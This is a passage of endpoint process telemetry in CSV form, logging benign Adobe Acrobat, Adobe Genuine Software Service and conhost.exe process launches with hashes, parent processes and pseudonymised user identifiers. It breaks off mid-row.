+719,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:45.878833+00:00,21048,FullTrustNotifier.exe,"""FullTrustNotifier.exe"" GetChannelUri",PortableExecutable,2020-10-22 07:42:28+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\FullTrustNotifier.exe,218608,5236a3cd1fc50ea204f57c9f66787dc6,79f2749d62da14edd4b797d0af539e996841c237795932c299b847bb7d2cd159,ba01717f097852cd19729f5e3146076d12bcc5c7,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:40.546030300+00:00,10668,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=18820",False,2021-06-24 00:52:40.477041800+00:00,18820,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:46.106537+00:00,2021-06-24 00:55:36.374582900+00:00,c0e8462a-0484-418b-8ca9-fe47e3989030,computerpii_0a470890c60768167990033d701e7bd881398861,169186,False,10.7740.19041.1052,False,11540474045175230,,11540474045175335,2021-06-24 00:52:40.546030300+00:00,10668,2021-06-24 00:52:40.546030300+00:00,AdobeCollabSync.exe,10668,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-24 00:52:40.482920+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+720,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:46.037980100+00:00,20008,AcrobatNotificationClient.exe,"""AcrobatNotificationClient.exe"" -ServerName:App.AppXj7d2pwbjt1by8j1s5wak729xa46cf4br.mca",PortableExecutable,2020-11-11 08:07:18.989716+00:00,C:\Program Files\WindowsApps\AcrobatNotificationClient_1.0.4.0_x86__e1rzdqpraam7r\AcrobatNotificationClient.exe,436744,7891b28b113d62e7e37907c2d6e3ef46,814f6df432e48e05efa6b2cd099cffeb727703f6d908a1089b3e11dc05e47c32,4d11fe2f0cd15c15eed3650941bd718ace64c289,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:46.111682700+00:00,2021-06-24 00:55:36.374630600+00:00,c150fc45-4460-40f1-bf1b-da17f2c1f9de,computerpii_0a470890c60768167990033d701e7bd881398861,169187,False,10.7740.19041.1052,False,11540474045136908,,11540474045175336,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,,,,,,
+721,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:46.500445500+00:00,16132,Acrobat.exe,"""Acrobat.exe"" /l /act",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:40.477041800+00:00,18820,AdobeCollabSync.exe,"""AdobeCollabSync.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:46.571211100+00:00,2021-06-24 00:55:36.375167200+00:00,61200bbc-c34e-4b31-84e6-cd51931fe1f8,computerpii_0a470890c60768167990033d701e7bd881398861,169198,False,10.7740.19041.1052,False,11540474045175229,,11540474045175337,2021-06-24 00:52:40.477041800+00:00,18820,2021-06-24 00:52:40.477041800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,18820,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-24 00:52:40.482920+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+722,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:47.333311600+00:00,15372,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_musoxy 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:47.662921500+00:00,2021-06-24 00:55:36.375365600+00:00,905712b7-8a25-4ebc-bc06-32916c3bedfd,computerpii_0a470890c60768167990033d701e7bd881398861,169202,False,10.7740.19041.1052,False,11540474045136991,,11540474045175338,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+723,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:47.342514200+00:00,1752,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:54:47.333311600+00:00,15372,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_musoxy 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:47.664873300+00:00,2021-06-24 00:55:36.375412800+00:00,07263a08-a0b2-44cd-907d-87768fb19061,computerpii_0a470890c60768167990033d701e7bd881398861,169203,False,10.7740.19041.1052,False,11540474045175338,,11540474045175339,2021-06-24 00:54:47.333311600+00:00,15372,2021-06-24 00:54:47.333311600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,15372,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:47.340761600+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+724,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:47.950183900+00:00,13496,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_pfvtpz 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:47.986202100+00:00,2021-06-24 00:55:36.375608100+00:00,8c9231b0-9409-4bde-9220-97f6bcc40441,computerpii_0a470890c60768167990033d701e7bd881398861,169207,False,10.7740.19041.1052,False,11540474045136991,,11540474045175340,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+725,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:47.951995100+00:00,15676,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_izjxml 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:47.986470100+00:00,2021-06-24 00:55:36.375656700+00:00,f979c754-596e-48b8-b7ec-85c156f9fadc,computerpii_0a470890c60768167990033d701e7bd881398861,169208,False,10.7740.19041.1052,False,11540474045136991,,11540474045175341,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+726,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:47.957528400+00:00,9180,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:54:47.950183900+00:00,13496,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_pfvtpz 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:47.986998700+00:00,2021-06-24 00:55:36.375707500+00:00,b4a063a3-9b35-47ab-a6dd-6199a49c6089,computerpii_0a470890c60768167990033d701e7bd881398861,169209,False,10.7740.19041.1052,False,11540474045175340,,11540474045175342,2021-06-24 00:54:47.950183900+00:00,13496,2021-06-24 00:54:47.950183900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,13496,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:47.340761600+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+727,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:47.958929+00:00,5968,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:54:47.951995100+00:00,15676,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_izjxml 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:47.987194100+00:00,2021-06-24 00:55:36.375755800+00:00,4bcddc82-7345-4649-8f19-6d1e33368cb3,computerpii_0a470890c60768167990033d701e7bd881398861,169210,False,10.7740.19041.1052,False,11540474045175341,,11540474045175343,2021-06-24 00:54:47.951995100+00:00,15676,2021-06-24 00:54:47.951995100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,15676,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:47.340761600+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+728,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:48.170466+00:00,19712,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_tppgaa 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:48.201665600+00:00,2021-06-24 00:55:36.376000600+00:00,483be0c8-765d-49f1-a88c-4ff4c85ba696,computerpii_0a470890c60768167990033d701e7bd881398861,169215,False,10.7740.19041.1052,False,11540474045136991,,11540474045175344,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+729,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:48.177541+00:00,20236,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a09448"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a09448""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,323272,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:48.202391600+00:00,2021-06-24 